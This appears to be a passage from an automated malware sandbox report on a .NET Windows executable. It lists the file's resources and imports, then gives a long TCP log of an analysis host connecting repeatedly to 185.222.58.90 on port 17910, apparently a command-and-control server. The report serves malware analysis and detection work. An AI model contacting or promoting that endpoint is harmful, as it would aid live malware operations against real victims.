POGCL	0x5e0b8	0xd	ASCII text, with no line terminators	English	United States
RDHOD	0x5e0c8	0xd	ASCII text, with no line terminators	English	United States
RJIEE	0x5e0d8	0xd	ASCII text, with no line terminators	English	United States
ROMNL	0x5e0e8	0xd	ASCII text, with no line terminators	English	United States
RPIDI	0x5e0f8	0xd	ASCII text, with no line terminators	English	United States
RPJGI	0x5e108	0xd	ASCII text, with no line terminators	English	United States
SASDM	0x5e118	0xd	ASCII text, with no line terminators	English	United States
SASKI	0x5e128	0xd	ASCII text, with no line terminators	English	United States
SCAHP	0x5e138	0xd	ASCII text, with no line terminators	English	United States
SFJED	0x5e148	0xd	ASCII text, with no line terminators	English	United States
SFJFG	0x5e158	0xd	ASCII text, with no line terminators	English	United States
SHDNR	0x5e168	0xd	ASCII text, with no line terminators	English	United States
SIPIL	0x5e178	0xd	ASCII text, with no line terminators	English	United States
SJGHI	0x5e188	0xd	ASCII text, with no line terminators	English	United States
RT_ICON	0x5e198	0xea8	data
RT_ICON	0x5f040	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 15914966, next used block 15850973
RT_ICON	0x5f8e8	0x6c8	data
RT_ICON	0x5ffb0	0x568	GLS_BINARY_LSB_FIRST
RT_ICON	0x60518	0x9c9c	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON	0x6a1b4	0x10828	dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
RT_ICON	0x7a9dc	0x94a8	data
RT_ICON	0x83e84	0x5488	data
RT_ICON	0x8930c	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 192, next used block 50331648
RT_ICON	0x8d534	0x25a8	data
RT_ICON	0x8fadc	0x10a8	data
RT_ICON	0x90b84	0x988	data
RT_ICON	0x9150c	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x91974	0xbc	data
RT_VERSION	0x91a30	0x1f8	data	English	United States
RT_MANIFEST	0x91c28	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 20, 2022 05:28:38.624659061 CEST	49742	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:28:38.651525974 CEST	17910	49742	185.222.58.90	192.168.2.3
Jun 20, 2022 05:28:38.652548075 CEST	49742	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:28:38.976849079 CEST	49742	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:28:39.081463099 CEST	17910	49742	185.222.58.90	192.168.2.3
Jun 20, 2022 05:28:39.321132898 CEST	49742	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:28:39.367479086 CEST	17910	49742	185.222.58.90	192.168.2.3
Jun 20, 2022 05:28:39.508434057 CEST	49742	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:28:39.727185011 CEST	17910	49742	185.222.58.90	192.168.2.3
Jun 20, 2022 05:28:39.820979118 CEST	49742	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:28:48.538961887 CEST	49742	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:28:48.631922007 CEST	17910	49742	185.222.58.90	192.168.2.3
Jun 20, 2022 05:28:48.632442951 CEST	49742	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:28:48.877168894 CEST	17910	49742	185.222.58.90	192.168.2.3
Jun 20, 2022 05:28:48.962007999 CEST	17910	49742	185.222.58.90	192.168.2.3
Jun 20, 2022 05:28:48.962059975 CEST	17910	49742	185.222.58.90	192.168.2.3
Jun 20, 2022 05:28:48.962099075 CEST	17910	49742	185.222.58.90	192.168.2.3
Jun 20, 2022 05:28:48.962137938 CEST	17910	49742	185.222.58.90	192.168.2.3
Jun 20, 2022 05:28:48.962142944 CEST	49742	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:28:48.962219954 CEST	49742	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.404450893 CEST	49742	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.412821054 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.431058884 CEST	17910	49742	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.431229115 CEST	49742	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.435580969 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.435691118 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.441262007 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.528793097 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.530352116 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.558073044 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.558115005 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.558140993 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.558167934 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.558195114 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.558197975 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.558221102 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.558237076 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.558248997 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.558249950 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.558262110 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.558276892 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.582742929 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.582794905 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.582825899 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.582851887 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.582879066 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.582900047 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.582964897 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.600414038 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.606693983 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.610811949 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.633666992 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.633709908 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.633843899 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.633877039 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.633892059 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.634033918 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.656419992 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.656466961 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.656568050 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.656620026 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.656806946 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.657228947 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.657319069 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.679089069 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.679265976 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.679375887 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.679584026 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.679857016 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.679928064 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.702820063 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.702872038 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.702991009 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.703022957 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.703084946 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.703322887 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.703891039 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.703983068 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.725572109 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.725706100 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.725749969 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.725841045 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.725939989 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.726027966 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.726466894 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.726495981 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.726576090 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.736526012 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.749541044 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.749578953 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.749726057 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.749814034 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.772376060 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.772505045 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.772531986 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.772800922 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.772924900 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.785515070 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.795170069 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.795222044 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.795252085 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.795319080 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.795350075 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.795388937 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.795481920 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.795522928 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.795828104 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.795934916 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.802027941 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.818202019 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.818274021 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.818483114 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.820554972 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.820745945 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.821846962 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.821924925 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.841118097 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.841152906 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.841238022 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.841270924 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.841387033 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.842803001 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.843324900 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.846568108 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.863789082 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.863914013 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.863928080 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.864005089 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.865236044 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.865377903 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.867928028 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.867958069 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.868006945 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.868124962 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.868937969 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.869172096 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.869266987 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.886693954 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.886967897 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.891247988 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.891458988 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.891550064 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.891628981 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.891652107 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.891720057 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.891896009 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.891969919 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.909612894 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.909755945 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.913867950 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.913976908 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.914179087 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.914484024 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.914582014 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:07.914653063 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.932511091 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.936609983 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.937012911 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.937197924 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.937216043 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:07.937551975 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.026248932 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.026460886 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.053881884 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.177638054 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.177794933 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.178595066 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.178632021 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.178754091 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.178816080 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.200310946 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.200423956 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.200545073 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.200582981 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.200670958 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.200695992 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.200917959 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.201016903 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.201318026 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.201411963 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.201605082 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.201733112 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.222928047 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.223365068 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.223464012 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.223674059 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.223845005 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.223921061 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.224004030 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.224234104 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.224265099 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.224311113 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.224329948 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.224397898 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.224514008 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.224628925 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.224899054 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.246192932 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.246225119 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.246372938 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.246562958 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.246774912 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.246843100 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.247272015 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.247351885 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.247498989 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.270643950 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.270890951 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.303850889 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.303994894 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.306061983 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.306181908 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.306838989 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.306921959 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.306938887 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.326574087 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.326646090 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.326849937 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.326898098 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.327176094 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.328706026 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.328830004 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.329292059 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.330789089 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.349447012 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.349705935 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.354989052 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.355021954 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.355324984 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.372282982 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.372466087 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.377782106 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.698479891 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.698566914 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.698643923 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.698683023 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.698808908 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.698929071 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.721864939 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.721898079 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.722033024 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.722064972 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.722207069 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.722351074 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.722461939 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.728864908 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.729427099 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.729453087 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.729595900 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.745318890 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.745419979 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.745601892 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.745697975 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.745846987 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.745877028 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.745938063 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.745975971 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.746388912 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.746465921 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.746597052 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.746684074 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.751960039 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.752060890 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.752142906 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.754126072 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.759509087 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.767678976 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.767796040 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.767894030 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.768270016 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.768354893 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.768559933 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.768585920 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.768652916 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.768692970 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.768733025 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.768819094 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.769032001 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.769119024 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.771661043 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.774523020 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.774637938 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.776500940 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.776712894 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.776818037 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.790374041 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.790497065 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.790851116 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.791109085 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.791233063 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.791338921 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.791596889 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.791723967 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.791821003 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.796968937 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.799416065 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.806531906 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.806685925 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.809073925 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.809168100 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.809688091 CEST	17910	49759	185.222.58.90	192.168.2.3
